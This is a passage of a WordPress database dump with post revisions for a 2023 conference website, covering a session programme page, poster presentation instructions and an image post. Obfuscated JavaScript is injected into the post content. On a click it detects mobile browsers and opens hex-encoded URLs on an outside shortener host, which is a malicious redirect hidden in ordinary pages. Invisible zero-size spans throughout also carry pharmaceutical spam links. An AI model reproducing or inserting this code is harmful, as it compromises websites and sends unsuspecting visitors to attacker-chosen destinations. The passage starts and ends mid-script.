]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.leivtra.com/\">樂威壯</a>\n</span>]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisbro.cc/\">犀利士</a>\n</span>_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisbro.cc/\">犀利士</a>\n</span>5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Program','','inherit','closed','closed','','5122-revision-v1','','','2023-10-03 13:29:59','2023-10-03 13:29:59','',5122,'https://gsw2023.com/?p=5497',0,'revision','',0),
(5498,0,'2023-10-03 13:29:59','2023-10-03 13:29:59','<span style=\"font-size: 12pt;\"><strong>Poster Design<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.curvbar.com/\">犀利士</a>\n</span> and Presentation</strong></span>\r\n<span style=\"font-size: 12pt;\"><strong>When you prepare your poster, please in mind the following instructions:</strong></span>\r\n\r\n Prepare a poster of size A0 (84.1cm x 118.9cm) in portrait orientation in advance.\r\n Design the space allocation in your poster carefully using several well-balanced sections including\r\ntitle, objectives, methodology, input data, case study, results, analysis, conclusions, etc. All\r\nsections should be well-presented using coloured paper or a colourfully painted border. Sections\r\nmay be connected by arrows to show the flow of study.\r\n There is no GSW 2023 poster template. You can use a template from your home institution.\r\n Use large characters that are at least 1 cm high and have a line width of at least 1 mm; the larger,\r\nthe better.\r\n<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span> Give each section a title and a brief explanation.\r\n\r\n&nbsp;\r\n\r\n<span style=\"font-size: 12pt;\"><strong>Poster Display</strong></span>\r\nOn the map in the programme booklet you will receive on ar<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span>rival, you will find the area in the building where your\r\nposter should be displayed. The poster board for your poster will be marked with your paper number. The poster\r\nshould be set up before the poster session starts and should stay on display until 5:00 PM . Adhesive tape\r\n(Velcro) will be provided to fix the poster on the poster board. The presenter must be present at the poster during\r\nthe display according to the GSW2023 Program <a href=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-13.pdf\"><span style=\"color: #0000ff;\"><strong>Here</strong></span></a>\r\nPlease remove your poster after 5:00 PM.\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](M<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.priligymall.cc/\">必利勁</a>\n</span>ath[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialismall.com/\">犀利士5mg</a>\n</span>x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Instructions for poster presentations','','inherit','closed','closed','','5132-revision-v1','','','2023-10-03 13:29:59','2023-10-03 13:29:59','',5132,'https://gsw2023.com/?p=5498',0,'revision','',0),
(5499,0,'2023-10-03 13:30:00','2023-10-03 13:30:00','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span><img src=\"https://gsw2023.com/wp-content/uploads/2023/08/b69e5201-9176-43d7-b10e-476efe69ecf1.jpg\" alt=\"\" width=\"1250\" height=\"1500\" class=\"alignnone size-full wp-image-5433\" /><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overf<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisweb.tw/\">犀利士</a>\n</span>low: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'147919<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisofr.com/\">犀利士</a>\n</span>2fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.viagraseo.com/\">威而鋼</a>\n</span>2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 